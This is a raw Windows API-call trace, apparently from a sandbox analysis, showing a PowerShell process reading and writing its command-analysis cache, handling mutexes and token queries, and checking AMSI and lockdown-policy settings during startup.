CoTaskMemAlloc (cb=0x20c) returned 0x1e35144f2b0 [0171.324] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144f2b0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.324] CoTaskMemFree (pv=0x1e35144f2b0) [0171.324] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0171.324] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8c350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7a0) returned 1 [0171.324] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c880 | out: lpFileInformation=0xb156f8c880*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c760) returned 1 [0171.325] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", nBufferLength=0x105, lpBuffer=0xb156f8c200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", lpFilePart=0x0) returned 0x93 [0171.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c6e0) returned 1 [0171.325] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_67a2505d-bf00-4e2f-b010-406d32caddc3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9cc [0171.325] GetFileType (hFile=0x9cc) returned 0x1 [0171.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c650) returned 1 [0171.325] GetFileType (hFile=0x9cc) returned 0x1 [0171.325] SetEndOfFile (hFile=0x9cc) returned 1 [0171.327] WriteFile (in: hFile=0x9cc, lpBuffer=0x1e339a30758*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8c0d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a30758*, lpNumberOfBytesWritten=0xb156f8c0d8*=0x1000, lpOverlapped=0x0) returned 1 [0171.335] WriteFile (in: hFile=0x9cc, lpBuffer=0x1e339a30758*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8c0d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a30758*, lpNumberOfBytesWritten=0xb156f8c0d8*=0x1000, lpOverlapped=0x0) returned 1 [0171.335] WriteFile (in: hFile=0x9cc, lpBuffer=0x1e339a30758*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0xb156f8c7e8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a30758*, lpNumberOfBytesWritten=0xb156f8c7e8*=0x2ef, lpOverlapped=0x0) returned 1 [0171.335] CloseHandle (hObject=0x9cc) returned 1 [0171.337] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144df90 [0171.337] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144df90 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.337] CoTaskMemFree (pv=0x1e35144df90) [0171.337] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8c160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0171.337] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c740) returned 1 [0171.337] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c820 | out: lpFileInformation=0xb156f8c820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0171.337] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0171.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0171.337] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9cc [0171.338] GetFileType (hFile=0x9cc) returned 0x1 [0171.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0171.338] GetFileType (hFile=0x9cc) returned 0x1 [0171.338] SetEndOfFile (hFile=0x9cc) returned 1 [0171.339] WriteFile (in: hFile=0x9cc, lpBuffer=0x1e339a34ee0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8bec8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a34ee0*, lpNumberOfBytesWritten=0xb156f8bec8*=0x1000, lpOverlapped=0x0) returned 1 [0171.340] WriteFile (in: hFile=0x9cc, lpBuffer=0x1e339a34ee0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8c098, lpOverlapped=0x0 | out: lpBuffer=0x1e339a34ee0*, lpNumberOfBytesWritten=0xb156f8c098*=0x1000, lpOverlapped=0x0) returned 1 [0171.341] WriteFile (in: hFile=0x9cc, lpBuffer=0x1e339a34ee0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8c098, lpOverlapped=0x0 | out: lpBuffer=0x1e339a34ee0*, lpNumberOfBytesWritten=0xb156f8c098*=0x1000, lpOverlapped=0x0) returned 1 [0171.341] WriteFile (in: hFile=0x9cc, lpBuffer=0x1e339a34ee0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8bec8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a34ee0*, lpNumberOfBytesWritten=0xb156f8bec8*=0x1000, lpOverlapped=0x0) returned 1 [0171.341] WriteFile (in: hFile=0x9cc, lpBuffer=0x1e339a34ee0*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0xb156f8c788, lpOverlapped=0x0 | out: lpBuffer=0x1e339a34ee0*, lpNumberOfBytesWritten=0xb156f8c788*=0xdda, lpOverlapped=0x0) returned 1 [0171.341] CloseHandle (hObject=0x9cc) returned 1 [0171.343] ReleaseMutex (hMutex=0x9c8) returned 1 [0171.344] EtwEventActivityIdControl () returned 0x0 [0171.344] SetEvent (hEvent=0x8f4) returned 1 [0171.344] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d090*=0x8f4, lpdwindex=0xb156f8ce64 | out: lpdwindex=0xb156f8ce64) returned 0x0 [0171.345] GetCurrentProcess () returned 0xffffffffffffffff [0171.345] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d318 | out: TokenHandle=0xb156f8d318*=0x9cc) returned 1 [0171.345] GetTokenInformation (in: TokenHandle=0x9cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8d418 | out: TokenInformation=0x0, ReturnLength=0xb156f8d418) returned 0 [0171.345] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d6010 [0171.345] GetTokenInformation (in: TokenHandle=0x9cc, TokenInformationClass=0x1, TokenInformation=0x1e3513d6010, TokenInformationLength=0x2c, ReturnLength=0xb156f8d418 | out: TokenInformation=0x1e3513d6010, ReturnLength=0xb156f8d418) returned 1 [0171.346] LocalFree (hMem=0x1e3513d6010) returned 0x0 [0171.347] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e339a487a0, cbSid=0xb156f8d410 | out: pSid=0x1e339a487a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8d410) returned 1 [0171.347] CreateMutexW (lpMutexAttributes=0x1e339a488f0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9d0 [0171.347] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d2b0*=0x9d0, lpdwindex=0xb156f8d084 | out: lpdwindex=0xb156f8d084) returned 0x0 [0171.347] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d230) returned 1 [0171.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d310 | out: lpFileInformation=0xb156f8d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d1f0) returned 1 [0171.348] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0171.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d170) returned 1 [0171.348] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9d4 [0171.348] GetFileType (hFile=0x9d4) returned 0x1 [0171.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d0e0) returned 1 [0171.348] GetFileType (hFile=0x9d4) returned 0x1 [0171.348] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a499b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cfd8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a499b8*, lpNumberOfBytesRead=0xb156f8cfd8*=0x1000, lpOverlapped=0x0) returned 1 [0171.350] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a4b78b, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0xb156f8cc78, lpOverlapped=0x0 | out: lpBuffer=0x1e339a4b78b*, lpNumberOfBytesRead=0xb156f8cc78*=0x28, lpOverlapped=0x0) returned 1 [0171.350] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a499b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cc48, lpOverlapped=0x0 | out: lpBuffer=0x1e339a499b8*, lpNumberOfBytesRead=0xb156f8cc48*=0x1000, lpOverlapped=0x0) returned 1 [0171.352] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a4b7b7, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0xb156f8cc78, lpOverlapped=0x0 | out: lpBuffer=0x1e339a4b7b7*, lpNumberOfBytesRead=0xb156f8cc78*=0x14, lpOverlapped=0x0) returned 1 [0171.352] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a499b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cc48, lpOverlapped=0x0 | out: lpBuffer=0x1e339a499b8*, lpNumberOfBytesRead=0xb156f8cc48*=0x1000, lpOverlapped=0x0) returned 1 [0171.353] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a4b77a, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0xb156f8cc78, lpOverlapped=0x0 | out: lpBuffer=0x1e339a4b77a*, lpNumberOfBytesRead=0xb156f8cc78*=0x2f, lpOverlapped=0x0) returned 1 [0171.353] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a499b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cc48, lpOverlapped=0x0 | out: lpBuffer=0x1e339a499b8*, lpNumberOfBytesRead=0xb156f8cc48*=0x1000, lpOverlapped=0x0) returned 1 [0171.353] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a4b740, nNumberOfBytesToRead=0x17, lpNumberOfBytesRead=0xb156f8cc08, lpOverlapped=0x0 | out: lpBuffer=0x1e339a4b740*, lpNumberOfBytesRead=0xb156f8cc08*=0x17, lpOverlapped=0x0) returned 1 [0171.353] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a499b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cca8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a499b8*, lpNumberOfBytesRead=0xb156f8cca8*=0xd58, lpOverlapped=0x0) returned 1 [0171.354] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a499b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cfa8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a499b8*, lpNumberOfBytesRead=0xb156f8cfa8*=0x0, lpOverlapped=0x0) returned 1 [0171.354] CloseHandle (hObject=0x9d4) returned 1 [0171.354] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xb156f8cf70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0171.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d400) returned 1 [0171.354] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e339a56a18 | out: lpFileInformation=0x1e339a56a18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0171.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3c0) returned 1 [0171.355] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0171.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d2f0) returned 1 [0171.355] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d3d0 | out: lpFileInformation=0xb156f8d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0171.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d2b0) returned 1 [0171.355] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", nBufferLength=0x105, lpBuffer=0xb156f8cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", lpFilePart=0x0) returned 0x93 [0171.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d230) returned 1 [0171.355] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_67a2505d-bf00-4e2f-b010-406d32caddc3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9d4 [0171.355] GetFileType (hFile=0x9d4) returned 0x1 [0171.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d1a0) returned 1 [0171.355] GetFileType (hFile=0x9d4) returned 0x1 [0171.355] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a57d28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d098, lpOverlapped=0x0 | out: lpBuffer=0x1e339a57d28*, lpNumberOfBytesRead=0xb156f8d098*=0x1000, lpOverlapped=0x0) returned 1 [0171.356] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a59b42, nNumberOfBytesToRead=0x3, lpNumberOfBytesRead=0xb156f8cd38, lpOverlapped=0x0 | out: lpBuffer=0x1e339a59b42*, lpNumberOfBytesRead=0xb156f8cd38*=0x3, lpOverlapped=0x0) returned 1 [0171.356] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a57d28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cd08, lpOverlapped=0x0 | out: lpBuffer=0x1e339a57d28*, lpNumberOfBytesRead=0xb156f8cd08*=0x1000, lpOverlapped=0x0) returned 1 [0171.356] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a57d28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8cca8, lpOverlapped=0x0 | out: lpBuffer=0x1e339a57d28*, lpNumberOfBytesRead=0xb156f8cca8*=0x2ec, lpOverlapped=0x0) returned 1 [0171.356] ReadFile (in: hFile=0x9d4, lpBuffer=0x1e339a57d28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d068, lpOverlapped=0x0 | out: lpBuffer=0x1e339a57d28*, lpNumberOfBytesRead=0xb156f8d068*=0x0, lpOverlapped=0x0) returned 1 [0171.356] CloseHandle (hObject=0x9d4) returned 1 [0171.356] ReleaseMutex (hMutex=0x9d0) returned 1 [0171.356] CoCreateGuid (in: pguid=0xb156f8d4c8 | out: pguid=0xb156f8d4c8*(Data1=0x8f9c774d, Data2=0x1810, Data3=0x4d7d, Data4=([0]=0x97, [1]=0x84, [2]=0x23, [3]=0x91, [4]=0x6f, [5]=0x5c, [6]=0x40, [7]=0x2d))) returned 0x0 [0171.357] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4 [0171.357] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9d8 [0171.357] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9dc [0171.357] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9e0 [0171.357] SetEvent (hEvent=0x9e0) returned 1 [0171.357] SetEvent (hEvent=0x9d4) returned 1 [0171.357] SetEvent (hEvent=0x9d8) returned 1 [0171.357] SetEvent (hEvent=0x9dc) returned 1 [0171.357] AmsiCloseSession () returned 0x7ffbe18d8068 [0171.357] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9e4 [0171.358] SetThreadUILanguage (LangId=0x0) returned 0x409 [0171.361] EtwEventActivityIdControl () returned 0x0 [0171.361] EtwEventActivityIdControl () returned 0x0 [0171.361] EtwEventActivityIdControl () returned 0x0 [0171.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8cbc0) returned 1 [0171.364] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cca0 | out: lpFileInformation=0xb156f8cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0171.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8cb80) returned 1 [0171.364] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0171.364] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0171.364] CoTaskMemAlloc (cb=0x20c) returned 0x1e351450c30 [0171.364] GetSystemDirectoryW (in: lpBuffer=0x1e351450c30, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0171.364] CoTaskMemFree (pv=0x1e351450c30) [0171.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0171.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5f0) returned 1 [0171.365] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c6d0 | out: lpFileInformation=0xb156f8c6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0171.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5b0) returned 1 [0171.365] WldpGetLockdownPolicy () returned 0x0 [0171.365] GetSystemInfo (in: lpSystemInfo=0xb156f8c730 | out: lpSystemInfo=0xb156f8c730*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0171.365] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8c638 | out: phkResult=0xb156f8c638*=0x9ec) returned 0x0 [0171.365] RegQueryValueExW (in: hKey=0x9ec, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8c688, lpData=0x0, lpcbData=0xb156f8c680*=0x0 | out: lpType=0xb156f8c688*=0x0, lpData=0x0, 